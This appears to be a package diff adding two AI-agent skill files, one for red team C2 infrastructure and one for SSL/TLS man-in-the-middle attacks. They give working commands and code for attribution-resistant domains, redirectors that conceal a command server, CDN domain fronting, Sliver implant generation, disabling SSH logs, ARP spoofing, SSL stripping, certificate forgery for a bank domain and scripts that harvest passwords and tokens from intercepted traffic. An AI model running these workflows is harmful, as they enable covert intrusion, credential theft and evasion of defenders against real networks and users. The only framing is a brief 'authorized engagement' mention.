rtexit-method 0.1.4 → 0.1.6

package/packaged-assets/.agents/skills/rt-redteam-infra/SKILL.md

@@ -0,0 +1,333 @@
+---
+name: rt-redteam-infra
+description: "Red team infrastructure setup and operational security skill. C2 server hardening, Apache/Nginx redirectors, domain fronting via CDN (Cloudflare, Azure CDN), malleable C2 profiles for Sliver/Cobalt Strike, categorized domain acquisition, SSL certificates for C2, team server setup, redirector chaining, and operator OPSEC. Use at the start of every engagement to build resilient, attribution-resistant infrastructure."
+---
+
+# rt-redteam-infra — Red Team Infrastructure & OpSec
+
+## Overview
+
+Professional red team infrastructure separates the operator from the target. If blue team blocks your C2 IP, redirectors absorb the hit while the team server stays hidden. Domain fronting makes C2 traffic look like legitimate CDN traffic. Good infrastructure = longer dwell time, realistic APT simulation.
+
+**Infrastructure layers:**
+```
+Operator → Team Server (hidden) → Redirector(s) → Target
+                                ↕
+                          CDN / Domain Front
+```
+
+---
+
+## Phase 1 — Domain Acquisition & Categorization
+
+```bash
+# Buy domains that look legitimate and are pre-categorized
+# Categorized domains bypass web proxies that block "Uncategorized" traffic
+
+# Check domain categorization
+curl "https://sitereview.bluecoat.com/v/sitereview.jsp?url=TARGET_DOMAIN"
+# Or: Fortinet, McAfee, Palo Alto URL categorization checkers
+
+# Good categories for C2: Technology, Business, CDN, Cloud Services
+# Bad categories: Newly Registered, Malware, Suspicious
+
+# Aged domains (registered 1+ years ago) = more trusted
+# Tool: expireddomains.net — find expired domains with good reputation
+
+# Domain naming patterns for believability:
+# cdn-assets-[company].com
+# updates-[software].com
+# telemetry-[product].net
+# api-gateway-[company].io
+# [company]-cloud-services.com
+
+# Check domain history before buying
+curl "https://web.archive.org/web/*/DOMAIN"
+# Avoid: domains previously used for spam/malware
+```
+
+---
+
+## Phase 2 — VPS / Cloud Infrastructure Setup
+
+```bash
+# Use separate providers for team server and redirectors
+# Team server: Hetzner, OVH, DigitalOcean (EU providers harder to subpoena quickly)
+# Redirectors: AWS, Azure, GCP (looks like legitimate cloud traffic)
+
+# NEVER use your real identity for red team infra
+# Pay with crypto or gift cards for anonymity in authorized tests
+
+# Basic VPS hardening (team server)
+# Change SSH port
+sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config
+systemctl restart sshd
+
+# Restrict access to team only
+ufw default deny incoming
+ufw allow from OPERATOR_IP to any port 2222  # SSH — operators only
+ufw allow from REDIRECTOR_IP to any port 50050  # Cobalt Strike / Sliver
+ufw allow 80,443/tcp  # For letsencrypt
+ufw enable
+
+# No logging of operator IPs
+sed -i 's/^LogLevel.*/LogLevel QUIET/' /etc/ssh/sshd_config
+
+# Firewall: only redirectors can reach team server
+# Targets should NEVER see team server IP directly
+iptables -A INPUT -s REDIRECTOR_IP -p tcp --dport 50050 -j ACCEPT
+iptables -A INPUT -p tcp --dport 50050 -j DROP
+```
+
+---
+
+## Phase 3 — Apache/Nginx Redirector Setup
+
+```bash
+# Redirector sits between target and team server
+# Blue team sees redirector IP — team server IP stays hidden
+# Redirector checks URI/headers → forwards legit C2 traffic → blocks scanners/defenders
+
+# Install Apache
+apt install apache2 -y
+a2enmod proxy proxy_http rewrite ssl headers
+
+# /etc/apache2/sites-available/redirector.conf
+cat > /etc/apache2/sites-available/redirector.conf << 'EOF'
+<VirtualHost *:443>
+    ServerName cdn-assets-corp.com
+    SSLEngine on
+    SSLCertificateFile    /etc/letsencrypt/live/cdn-assets-corp.com/fullchain.pem
+    SSLCertificateKeyFile /etc/letsencrypt/live/cdn-assets-corp.com/privkey.pem
+
+    # Only forward requests matching C2 URI pattern
+    # Everything else → redirect to innocent site (avoids detection)
+    RewriteEngine On
+    RewriteCond %{REQUEST_URI} ^/updates/client/[a-f0-9]{32}$  [NC]
+    RewriteRule ^(.*)$ https://TEAM_SERVER_IP:443$1 [P,L]
+
+    # All other traffic → redirect to Microsoft (looks like CDN)
+    RewriteRule ^(.*)$ https://www.microsoft.com/ [R=302,L]
+
+    # Block scanners
+    RewriteCond %{HTTP_USER_AGENT} (curl|python|nmap|masscan|zgrab) [NC]
+    RewriteRule .* - [F]
+
+    ProxyPassReverse / https://TEAM_SERVER_IP:443/
+    SSLProxyEngine On
+    SSLProxyVerify none
+</VirtualHost>
+EOF
+
+a2ensite redirector.conf && systemctl reload apache2
+
+# Get SSL cert (Let's Encrypt)
+certbot --apache -d cdn-assets-corp.com
+```
+
+---
+
+## Phase 4 — Domain Fronting via CDN
+
+```bash
+# Domain fronting: use CDN to hide true destination
+# HTTP Host header = your C2 domain
+# SNI/TLS = legitimate CDN domain (e.g., allowed-corp.cloudfront.net)
+# CDN routes based on Host header → reaches your C2
+
+# Cloudflare Workers domain fronting
+# 1. Put your C2 domain behind Cloudflare (DNS proxied)
+# 2. Configure Worker to route to team server
+# worker.js:
+cat > worker.js << 'EOF'
+addEventListener('fetch', event => {
+  event.respondWith(handleRequest(event.request))
+})
+async function handleRequest(request) {
+  const url = new URL(request.url)
+  // Forward to team server
+  const newUrl = `https://TEAM_SERVER_IP${url.pathname}${url.search}`
+  return fetch(newUrl, {
+    method: request.method,
+    headers: request.headers,
+    body: request.body
+  })
+}
+EOF
+# Deploy via wrangler CLI
+
+# Azure CDN fronting
+# Create Azure CDN endpoint → origin = team server
+# Custom domain = your C2 domain
+# Traffic appears to come from *.azureedge.net
+
+# Test domain fronting
+curl -H "Host: YOUR_C2_DOMAIN" https://ALLOWED_CDN_DOMAIN/c2-check
+```
+
+---
+
+## Phase 5 — Sliver C2 with Redirectors
+
+```bash
+# Sliver team server setup (open source C2)
+curl https://sliver.sh/install | sudo bash
+
+# Start Sliver server
+sudo systemctl start sliver
+
+# Connect operator
+sliver-client
+
+# Generate implant pointing to redirector (NOT team server)
+generate --http https://cdn-assets-corp.com --os windows --arch amd64 \
+  --name implant --save /tmp/
+
+# Create HTTP listener on team server
+https -l 443 -d cdn-assets-corp.com
+
+# Multiplayer (team) — add operators
+new-operator --name operator1 --lhost TEAM_SERVER_IP
+# Generates operator1.cfg → share with team member
+
+# Implant traffic flow:
+# Target → https://cdn-assets-corp.com (redirector) → TEAM_SERVER_IP:443 (sliver)
+```
+
+---
+
+## Phase 6 — Malleable C2 Profiles
+
+```bash
+# Malleable profiles customize how C2 traffic looks
+# Goal: make beacon traffic look like legitimate application traffic
+
+# Sliver custom traffic profile (traffic looks like Google Analytics)
+# Edit ~/.sliver/configs/http-c2.yaml
+
+# Custom URI patterns
+uris:
+  - /collect
+  - /analytics.js
+  - /gtag/js
+  - /ga.js
+
+# Custom headers (mimics Google Analytics)
+headers:
+  - "Cache-Control: no-cache"
+  - "Accept: text/html,application/xhtml+xml"
+  - "Accept-Language: en-US,en;q=0.9"
+
+# Cobalt Strike malleable profile example (if available)
+# https://github.com/rsmudge/Malleable-C2-Profiles
+
+# Amazon profile (traffic looks like AWS API calls)
+set useragent "aws-sdk-java/1.12.261";
+http-get {
+    set uri "/v1/metadata/";
+    client { header "x-amz-date" "..."; }
+}
+
+# Test profile detection
+# c2lint profile.profile  # CS built-in validator
+# Or: pipe implant traffic through Wireshark → verify looks like claimed app
+```
+
+---
+
+## Phase 7 — Operator OPSEC
+
+```bash
+# Never connect directly to targets from your real IP
+# Chain: Operator → VPN → Jump box → Target
+
+# VPN for operators
+# WireGuard setup on jump box
+apt install wireguard -y
+wg genkey | tee /etc/wireguard/private.key | wg pubkey > /etc/wireguard/public.key
+
+# /etc/wireguard/wg0.conf (server)
+[Interface]
+Address = 10.8.0.1/24
+ListenPort = 51820
+PrivateKey = SERVER_PRIVATE_KEY
+PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
+
+[Peer]
+# Operator 1
+PublicKey = OPERATOR1_PUBLIC_KEY
+AllowedIPs = 10.8.0.2/32
+
+wg-quick up wg0
+
+# OPSEC checklist per engagement:
+# ✅ All traffic through VPN → jump box → target
+# ✅ No direct connections team server ↔ target
+# ✅ Redirectors in place before first beacon
+# ✅ Domain categorized before use
+# ✅ Unique implant per target (no cross-engagement reuse)
+# ✅ Malleable profile matching engagement's allowed traffic
+# ✅ Timestomp all dropped files
+# ✅ Clear logs after engagement (with client approval)
+# ✅ Screenshot all actions for evidence
+
+# Deconfliction — register your IPs with SOC
+# "Safe listing" — tell blue team your op IPs to avoid friendly fire
+# Deconfliction email: "Our red team IPs: X.X.X.X — please whitelist"
+```
+
+---
+
+## Phase 8 — Infrastructure Teardown
+
+```bash
+# After engagement ends — destroy all infrastructure
+
+# Remove implants
+# In Sliver: session → kill → all
+sessions
+kill --all
+
+# Destroy VPS instances
+# AWS: aws ec2 terminate-instances --instance-ids i-XXXXX
+# DigitalOcean: doctl compute droplet delete DROPLET_ID
+
+# Revoke certificates
+certbot revoke --cert-path /etc/letsencrypt/live/DOMAIN/cert.pem
+
+# Remove DNS records
+# Delete all A records pointing to red team infrastructure
+
+# Burn domains (don't reuse across engagements)
+# Each engagement = fresh domains
+
+# Final checklist:
+# ✅ All beacons killed
+# ✅ Persistence removed from targets
+# ✅ VPS destroyed
+# ✅ Domains released/burned
+# ✅ Operator VPN config revoked
+# ✅ Evidence logs delivered to client
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Single VPS + direct C2 connection (no redirectors) — acceptable for simple engagements
+
+**INTERMEDIATE:** Nginx redirector + categorized domain + Let's Encrypt cert + WireGuard VPN for operators
+
+**ADVANCED:** Apache malleable redirector + domain fronting via CDN + Sliver with custom HTTP profile
+
+**EXPERT:** Multi-hop redirector chains + multiple CDN providers + custom malleable profiles + full deconfliction workflow
+
+---
+
+## References
+
+- Sliver C2: https://github.com/BishopFox/sliver
+- Malleable C2 Profiles: https://github.com/rsmudge/Malleable-C2-Profiles
+- RedTeam Infrastructure Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
+- MITRE ATT&CK T1090: https://attack.mitre.org/techniques/T1090/

package/packaged-assets/.agents/skills/rt-ssl-mitm/SKILL.md

@@ -0,0 +1,305 @@
+---
+name: rt-ssl-mitm
+description: "SSL/TLS interception and Man-in-the-Middle skill for authorized engagements. mitmproxy transparent proxy setup, Burp Suite MITM configuration, custom CA certificate injection, SSL stripping with SSLstrip2, HSTS bypass, certificate pinning bypass (mobile/desktop), TLS downgrade attacks, and traffic decryption workflows. Use when testing HTTPS applications, intercepting mobile app traffic, or demonstrating insecure TLS configurations."
+---
+
+# rt-ssl-mitm — SSL/TLS Interception & Man-in-the-Middle
+
+## Overview
+
+SSL/TLS MITM attacks intercept encrypted HTTPS traffic between a client and server. In authorized red team engagements, this demonstrates: weak certificate validation, missing HSTS, bypassable certificate pinning, insecure TLS configurations, and cleartext credential exposure after decryption.
+
+**Attack scenarios:**
+- Intercept mobile app traffic (no certificate pinning)
+- Demonstrate SSL stripping on internal network
+- Forge certificates to impersonate internal services
+- Decrypt TLS traffic for credential harvesting
+- TLS downgrade to expose weak cipher suites
+
+---
+
+## Prerequisites
+
+```bash
+# Install tools
+pip3 install mitmproxy
+apt install sslstrip2 bettercap wireshark tcpdump -y
+
+# Burp Suite Pro/Community — https://portswigger.net/burp
+# mitmproxy — https://mitmproxy.org
+```
+
+---
+
+## Method 1 — mitmproxy (Full HTTPS Interception)
+
+### 1a — Transparent Proxy (No client config needed — network position)
+
+```bash
+# Enable IP forwarding
+echo 1 > /proc/sys/net/ipv4/ip_forward
+
+# ARP spoof target (position yourself between target and gateway)
+arpspoof -i eth0 -t TARGET_IP GATEWAY_IP &
+arpspoof -i eth0 -t GATEWAY_IP TARGET_IP &
+
+# Redirect HTTP and HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80  -j REDIRECT --to-port 8080
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
+
+# Start mitmproxy in transparent mode
+mitmproxy --mode transparent --showhost
+
+# Or mitmdump (no UI — log to file)
+mitmdump --mode transparent --showhost -w traffic.mitm
+
+# View captured traffic
+mitmproxy -r traffic.mitm
+```
+
+### 1b — Regular Proxy Mode (Configure browser/app to use proxy)
+
+```bash
+# Start mitmproxy
+mitmproxy -p 8080
+
+# Or with web UI
+mitmweb -p 8080
+# Access: http://127.0.0.1:8081
+
+# Install mitmproxy CA cert on target device
+# CA cert location: ~/.mitmproxy/mitmproxy-ca-cert.pem
+# Android: Settings → Security → Install from storage
+# iOS: Settings → General → Profile → Install
+# Windows: certmgr.msc → Trusted Root CAs → Import
+# Linux: cp mitmproxy-ca-cert.pem /usr/local/share/ca-certificates/ && update-ca-certificates
+```
+
+### 1c — mitmproxy Scripts (Extract credentials automatically)
+
+```python
+# cred_extractor.py — auto-extract POST credentials
+from mitmproxy import http
+import re
+
+def request(flow: http.HTTPFlow):
+    if flow.request.method == "POST":
+        body = flow.request.get_text()
+        # Extract common credential patterns
+        patterns = [
+            r'(password|passwd|pass|pwd)=([^&\s]+)',
+            r'(username|user|login|email)=([^&\s]+)',
+            r'"(password|token|api_key)"\s*:\s*"([^"]+)"',
+        ]
+        for p in patterns:
+            for m in re.findall(p, body, re.IGNORECASE):
+                print(f"[CRED] {flow.request.host} | {m[0]}={m[1]}")
+        # Log all POST to file
+        with open("/tmp/posts.log", "a") as f:
+            f.write(f"\n=== {flow.request.host}{flow.request.path} ===\n{body}\n")
+```
+
+```bash
+# Run with script
+mitmproxy -p 8080 -s cred_extractor.py
+```
+
+---
+
+## Method 2 — Burp Suite MITM
+
+```bash
+# Start Burp Suite → Proxy → Options
+# Bind: 0.0.0.0:8080 (all interfaces)
+# Import Burp CA: http://burpsuite/cert → download → install on target
+
+# Intercept all HTTPS from target network
+# Add upstream proxy chain if needed:
+# User Options → Connections → Upstream Proxy → add target network gateway
+
+# Burp invisible proxy (for non-proxy-aware clients)
+# Proxy → Options → Edit listener → Request Handling
+# ☑ Support invisible proxying
+# Add iptables redirect rules (same as mitmproxy transparent)
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+```
+
+---
+
+## Method 3 — SSL Stripping (HTTP Downgrade)
+
+```bash
+# SSLstrip2 + bettercap — downgrades HTTPS to HTTP even with HSTS (partially)
+
+# Method A: bettercap (modern, all-in-one)
+bettercap -iface eth0
+
+# In bettercap console:
+net.probe on                    # Discover hosts
+set arp.spoof.targets TARGET_IP
+arp.spoof on                    # Position as MITM
+set net.sniff.verbose true
+net.sniff on                    # Capture traffic
+https.proxy on                  # SSL strip
+
+# Method B: sslstrip2
+python3 sslstrip2.py -l 10000 -w stripped.log
+
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
+
+# HSTS bypass technique: rename www.target.com → wwww.target.com (extra w)
+# If HSTS not pinned to subdomains, works on some sites
+```
+
+---
+
+## Method 4 — Custom CA Certificate Forgery
+
+```bash
+# Generate your own CA
+openssl genrsa -out myCA.key 4096
+openssl req -x509 -new -nodes -key myCA.key -sha256 -days 1825 \
+  -out myCA.pem \
+  -subj "/C=US/ST=NY/O=Corp IT/CN=Corp Internal CA"
+
+# Sign a fake certificate for any domain
+openssl genrsa -out fake.key 2048
+openssl req -new -key fake.key -out fake.csr \
+  -subj "/CN=login.bank.com/O=Bank Corp/C=US"
+
+openssl x509 -req -in fake.csr -CA myCA.pem -CAkey myCA.key \
+  -CAcreateserial -out fake.crt -days 365 -sha256 \
+  -extfile <(printf "subjectAltName=DNS:login.bank.com,DNS:*.bank.com")
+
+# Configure nginx to serve with fake cert
+server {
+    listen 443 ssl;
+    server_name login.bank.com;
+    ssl_certificate /path/to/fake.crt;
+    ssl_certificate_key /path/to/fake.key;
+    location / { proxy_pass https://real-login.bank.com; }
+}
+# If target has your CA installed → no browser warning
+```
+
+---
+
+## Method 5 — TLS Configuration Audit & Downgrade
+
+```bash
+# Test TLS configuration of target
+testssl.sh https://target.com
+# Checks: supported versions, cipher suites, HSTS, HPKP, certificate issues
+
+# Check for weak ciphers
+nmap --script ssl-enum-ciphers -p 443 target.com
+# Look for: SSLv3, TLSv1.0, TLSv1.1, RC4, DES, EXPORT ciphers
+
+# Check certificate details
+openssl s_client -connect target.com:443 -showcerts 2>/dev/null | openssl x509 -noout -text
+# Look for: SHA1 signature, weak key size (<2048), expired, wrong SAN
+
+# TLS downgrade test
+openssl s_client -connect target.com:443 -tls1    # Force TLS 1.0
+openssl s_client -connect target.com:443 -ssl3    # Force SSLv3 (POODLE)
+openssl s_client -connect target.com:443 -cipher RC4-SHA  # Force RC4
+
+# BEAST/POODLE/DROWN scanner
+python3 test-rc4.py target.com
+```
+
+---
+
+## Method 6 — Certificate Pinning Bypass
+
+```bash
+# Mobile apps pin the server certificate — MITM fails without bypass
+# See also: rt-exploit-android / rt-exploit-ios for Frida-based bypass
+
+# Universal pinning bypass (Frida)
+frida -U -f com.target.app --no-pause -s ssl-pinning-bypass.js
+# Scripts: github.com/httptoolkit/frida-interception-and-unpinning
+
+# objection (easier)
+objection -g com.target.app explore
+objection> android sslpinning disable
+objection> ios sslpinning disable
+
+# Desktop apps (Charles/mitmproxy CA install + bypass)
+# Electron: nodeIntegration=true → patch tlsSocket
+# .NET: add custom CertificateValidationCallback returning true
+# Java: override TrustManager to accept all certs
+```
+
+---
+
+## Method 7 — Network-Wide Interception (Internal Red Team)
+
+```bash
+# Full internal network MITM — intercept all HTTPS traffic on subnet
+
+# Step 1 — ARP spoof entire subnet (use carefully — can cause DoS)
+bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.0/24; arp.spoof on; net.sniff on"
+
+# Step 2 — Redirect all HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+mitmproxy --mode transparent
+
+# Step 3 — Parse captured traffic
+mitmdump -r traffic.mitm -q --flow-detail 3 | grep -i "password\|token\|Authorization"
+
+# Step 4 — Extract credentials from MITM dump
+python3 << 'EOF'
+from mitmproxy.io import FlowReader
+with open("traffic.mitm", "rb") as f:
+    reader = FlowReader(f)
+    for flow in reader.stream():
+        if hasattr(flow, 'request') and flow.request.method == "POST":
+            print(f"HOST: {flow.request.host}")
+            print(f"BODY: {flow.request.get_text()[:500]}")
+            print("---")
+EOF
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Burp Suite proxy + install CA cert → intercept browser traffic
+
+**INTERMEDIATE:** mitmproxy transparent proxy + ARP spoof → network-wide interception + credential extraction script
+
+**ADVANCED:** SSL stripping with bettercap + HSTS bypass + certificate forgery for internal services
+
+**EXPERT:** Custom mitmproxy scripts for automated credential harvesting + TLS fingerprint analysis + certificate pinning bypass on hardened apps
+
+---
+
+## Findings Documentation
+
+```
+Finding: SSL/TLS Interception Possible
+Severity: HIGH
+CVSS: 7.4 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
+MITRE: T1557.002 (ARP Cache Poisoning), T1040 (Network Sniffing)
+
+Evidence:
+- Screenshot of intercepted credentials in mitmproxy
+- List of hosts with no HSTS or HPKP
+- TLS version support matrix from testssl.sh
+
+Remediation:
+- Enforce HSTS with max-age=31536000; includeSubDomains; preload
+- Implement certificate pinning in mobile/desktop apps
+- Disable TLS 1.0/1.1 and weak cipher suites
+- Deploy 802.1X on internal network to prevent ARP spoofing
+```
+
+---
+
+## References
+
+- mitmproxy docs: https://docs.mitmproxy.org
+- bettercap: https://www.bettercap.org
+- testssl.sh: https://github.com/drwetter/testssl.sh
+- MITRE T1557: https://attack.mitre.org/techniques/T1557/